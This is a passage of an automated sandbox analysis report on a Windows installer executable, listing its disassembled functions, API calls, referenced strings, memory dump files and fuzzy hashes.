Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4

Function 00406034 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061CF,?,?), ref: 0040606F
GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078

Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85

GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
wsprintfA.USER32 ref: 004060B3
GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,?,004275C8,?,?,?,?,?), ref: 004060EE
GlobalAlloc.KERNEL32(?,0000000A,?,?,?,?), ref: 004060FD
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
GlobalFree.KERNEL32(00000000), ref: 0040619C
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3

Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\KO0q4biYfC.exe,80000000,00000003), ref: 00405EE2
Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04

Strings

%ls=%ls, xrefs: 004060A9
[Rename], xrefs: 0040611D, 0040612F

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
Opcode Fuzzy Hash: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD

Function 0040667C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\KO0q4biYfC.exe",00403480,C:\Users\user~1\AppData\Local\Temp\,771B3420,004036EF,?,00000006,?,0000000A), ref: 004066DF
CharNextW.USER32(?,?,?,00000000,?,00000006,?,0000000A), ref: 004066EE
CharNextW.USER32(?,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\KO0q4biYfC.exe",00403480,C:\Users\user~1\AppData\Local\Temp\,771B3420,004036EF,?,00000006,?,0000000A), ref: 004066F3
CharPrevW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\KO0q4biYfC.exe",00403480,C:\Users\user~1\AppData\Local\Temp\,771B3420,004036EF,?,00000006,?,0000000A), ref: 00406706

Strings

"C:\Users\user\Desktop\KO0q4biYfC.exe", xrefs: 0040667C
*?|<>/":, xrefs: 004066CE
C:\Users\user~1\AppData\Local\Temp\, xrefs: 0040667D, 00406682

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\KO0q4biYfC.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
API String ID: 589700163-102408103
Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD

Function 004043C6 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004043E3
GetSysColor.USER32(00000000), ref: 00404421
SetTextColor.GDI32(?,00000000), ref: 0040442D
SetBkMode.GDI32(?,?), ref: 00404439
GetSysColor.USER32(?), ref: 0040444C
SetBkColor.GDI32(?,?), ref: 0040445C
DeleteObject.GDI32(?), ref: 00404476
CreateBrushIndirect.GDI32(?), ref: 00404480

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54

Function 00402E8E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00402EA9
GetTickCount.KERNEL32 ref: 00402EC7
wsprintfW.USER32 ref: 00402EF5

Part of subcall function 00405450: lstrlenW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
Part of subcall function 00405450: lstrcatW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,00402F08,00402F08,Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,00000000,00000000,00000000), ref: 004054AB
Part of subcall function 00405450: SetWindowTextW.USER32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll), ref: 004054BD
Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B

CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
ShowWindow.USER32(00000000,00000005), ref: 00402F27

Part of subcall function 00402E72: MulDiv.KERNEL32(000271D3,?,0002930E), ref: 00402E87

Strings

... %d%%, xrefs: 00402EEF

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: 3d3304eb45bb23b080e092fab2be1e5bf8cbc78acc5d7d16839361ab4b58e06d
Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
Opcode Fuzzy Hash: 3d3304eb45bb23b080e092fab2be1e5bf8cbc78acc5d7d16839361ab4b58e06d
Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE

Function 00404D1A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
GetMessagePos.USER32 ref: 00404D3D
ScreenToClient.USER32(?,?), ref: 00404D57
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F

Strings

f, xrefs: 00404D6B

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4

Function 00401DB9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401DBC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
ReleaseDC.USER32(?,00000000), ref: 00401DEF
CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E

Strings

Tahoma, xrefs: 00401E24

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Tahoma
API String ID: 3808545654-3580928618
Opcode ID: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
Opcode Fuzzy Hash: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D

Function 00402DF3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
wsprintfW.USER32 ref: 00402E45
SetWindowTextW.USER32(?,?), ref: 00402E55
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67

Strings

verifying installer: %d%%, xrefs: 00402E3A
unpacking data: %d%%, xrefs: 00402E33, 00402E43

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99

Function 73C62569 Relevance: 9.1, APIs: 6, Instructions: 109COMMON

Download Yara Rule

APIs

Part of subcall function 73C6121B: GlobalAlloc.KERNELBASE(?,?,73C6123B,?,73C612DF,00000019,73C611BE,-000000A0), ref: 73C61225

GlobalFree.KERNEL32(?), ref: 73C62657
GlobalFree.KERNEL32(00000000), ref: 73C6268C

Memory Dump Source

Source File: 00000000.00000002.1397177339.0000000073C61000.00000020.00000001.01000000.00000006.sdmp, Offset: 73C60000, based on PE: true

Associated: 00000000.00000002.1396201484.0000000073C60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1397405949.0000000073C64000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1399176376.0000000073C66000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73c60000_KO0q4biYfC.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 382e4b98ced48bc8f51ac7ef72b44490c9b887940fdbbe4c5e958b23cefe780e
Instruction ID: 68015295313b55deff900c5743df335419f36b273c94ff8f680992100ae00be3
Opcode Fuzzy Hash: 382e4b98ced48bc8f51ac7ef72b44490c9b887940fdbbe4c5e958b23cefe780e
Instruction Fuzzy Hash: CE31DC72104599EFDB16EF52C8D4E2A7BBAFF853017254529F646CB2A0C730EC15CB62

Function 004028DD Relevance: 9.1, APIs: 6, Instructions: 72memoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\KO0q4biYfC.exe,80000000,00000003), ref: 00405EE2
Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04

GlobalAlloc.KERNEL32(?,?), ref: 00402901
CloseHandle.KERNEL32(?), ref: 00402981

Part of subcall function 0040345D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B

GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 0040291D
GlobalFree.KERNEL32(?), ref: 00402956
GlobalFree.KERNEL32(00000000), ref: 00402969

Part of subcall function 004031D6: SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 004031FB

DeleteFileW.KERNEL32(?), ref: 00402995

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: File$Global$AllocFreePointer$AttributesCloseCreateDeleteHandle
String ID:
API String ID: 488507980-0
Opcode ID: 8381b4231eabbf673b08069758c6843b617af172fec4b02a039423957ade8c5d
Instruction ID: a72baa4c232b972dd9d74bdb0255e4e47dd94c062f2630ea412bfe515796ae85
Opcode Fuzzy Hash: 8381b4231eabbf673b08069758c6843b617af172fec4b02a039423957ade8c5d
Instruction Fuzzy Hash: 7A216DB1D00118BBCF116FA5DE48CAE7E79EF09364F10013AF5947A2E0CB794D419B98

Function 00404C0C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
wsprintfW.USER32 ref: 00404CB6
SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9

Strings

(7B, xrefs: 00404C9F
%u.%u%s%s, xrefs: 00404C97

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$(7B
API String ID: 3540041739-1320723960
Opcode ID: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
Opcode Fuzzy Hash: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8

Function 00402598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp,000000FF,C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,?,?,?,00000021), ref: 004025E8
lstrlenA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,?,?,C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp,000000FF,C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,?,?,?,00000021), ref: 004025F3

Strings

C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll, xrefs: 004025B3, 004025DA, 004025EE, 0040263A
C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp, xrefs: 004025E1

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen
String ID: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp$C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll
API String ID: 3109718747-2219207328
Opcode ID: 43ad42b55247376bb2ab46c00e326ba01da809c0ffe6f982d396e576083aa9ce
Instruction ID: c13fbae436403556d6c48d38c5ac6db5007ae9437622b5a65b164b2cac9ab4a1
Opcode Fuzzy Hash: 43ad42b55247376bb2ab46c00e326ba01da809c0ffe6f982d396e576083aa9ce
Instruction Fuzzy Hash: FB110B72A00301BADB106BB18E8999F7664AF44359F20443BF502F21D0D9FC89416B5E

Function 73C618D9 Relevance: 7.7, APIs: 5, Instructions: 194COMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(?), ref: 73C6193A
GlobalFree.KERNEL32(?), ref: 73C61ADA
GlobalFree.KERNEL32(?), ref: 73C61ADF

Memory Dump Source

Source File: 00000000.00000002.1397177339.0000000073C61000.00000020.00000001.01000000.00000006.sdmp, Offset: 73C60000, based on PE: true

Associated: 00000000.00000002.1396201484.0000000073C60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1397405949.0000000073C64000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1399176376.0000000073C66000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73c60000_KO0q4biYfC.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: b702063e7cd0bf73acc7e7462ad5b72bc8d00f8d0ddf92046949d18749656919
Instruction ID: c116bd46b8311ef40a762c411fc2db6944c4edb6ca1001ae9daea2c734a6b0f9
Opcode Fuzzy Hash: b702063e7cd0bf73acc7e7462ad5b72bc8d00f8d0ddf92046949d18749656919
Instruction Fuzzy Hash: 8D51F672D00159DBDB02DFA6CDC07ADBBBAEF44312F0A4259D407EB296D670AF818791

Function 73C62394 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 73C624D6

Part of subcall function 73C6122C: lstrcpynW.KERNEL32(00000000,?,73C612DF,00000019,73C611BE,-000000A0), ref: 73C6123C

GlobalAlloc.KERNEL32(?), ref: 73C6245C
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 73C62477

Memory Dump Source

Source File: 00000000.00000002.1397177339.0000000073C61000.00000020.00000001.01000000.00000006.sdmp, Offset: 73C60000, based on PE: true

Associated: 00000000.00000002.1396201484.0000000073C60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1397405949.0000000073C64000.00000002.00000001.01000000.00000006.sdmpDownload File
